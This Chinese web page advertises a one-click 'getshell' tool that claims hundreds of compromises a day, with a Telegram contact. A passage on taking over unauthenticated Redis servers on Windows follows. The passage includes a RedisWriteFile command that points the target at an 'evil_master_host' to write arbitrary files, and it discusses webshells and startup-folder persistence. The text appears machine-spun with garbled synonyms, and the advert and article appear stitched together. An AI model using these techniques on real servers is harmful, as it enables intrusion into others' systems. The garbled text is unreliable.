常用getshell工具下载

常用getshell工具下载,是一款全自动一键傻瓜式getshell工具,日出上百

演示的地址：https://note.youdao.com/s/Xi9S4I16

tg【xise404】

曾经无数次遇到未受权或弱口令的Redis都会欣喜若狂，根本上能够说未受权约等于getshell。但近期的几次竞赛中却遇到了Windows上的Redis...

说到Linux上的Redis，getshell的路子无非两类：一类是直接写入文件，能够是webshell也能够是方案任务，亦或是ssh公钥；另一种是Redis4.x、5.x上的主从getshell，这比写东西来的更直接便当。

到了Windows上，事情变得难搞了。首先，Windows的启动项和方案任务并不是以文本方式保管在固定位置的，因而这条路行不通；Web目录写马条件又比拟苛刻，首先这台机器上要有Web，其次还要有时机泄露Web的绝对途径；而Windows的Redis最新版本还停留在3.2，应用主从破绽直接getshell也没戏了。

查遍了网上现有的文章发现一切的办法都有局限性，但也无妨做个整理或尝试一下其他途径，在不同的场景下说不准哪一种就能够应用呢？

0x01 写无损文件

在消费环境中，直接经过Redis写文件很可能会携带脏数据，由于Windows环境对Redis的getshell并不友好，很多操作并不是直接getshell，可能需求应用Redis写入二进制文件、快捷方式等，那么这个时分写入无损文件就十分重要了。

这里引荐一款工具——RedisWriteFile。其原理是应用Redis的主从同步写数据，脚本将本人模仿为master，设置对端为slave，这里master的数据空间是能够保证绝对洁净的，因而就轻松完成了写无损文件了。

命令格式如下：

python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename]

在我们的效劳器中运转该脚本（目的Redis一定要能回连我们的效劳器才行）：

Redis效劳器中显现其被设置为slave，同步数据并写入文件：

0x02 getshell

从上面的描绘以及测试能够肯定，目前我们有一个Redis用户权限停止恣意写，因而问题也就等价于：在Windows中如何经过新建/掩盖文件到达执行恣意命令的效果。

1.最理想的状况

假如碰到Redis的机器上有Web，并且能够泄露其绝对途径的话那真是撞大运了，直接写Webshell即可。

2.启动项

这也是网上各种“教程”中最常提到的办法。有些文章中玩出了把戏，有用ps脚本的、远程加载ps脚本的、下载到本地执行的......但其实究竟还是没有脱离启动项这个trigger。

和Linux不太相同，Windows的自启动有几类：系统效劳、方案任务、注册表启动项、用户的startup目录。其中前三种是无法经过单纯向某目录中写文件完成精准窜改的，因而只要startup目录能够应用。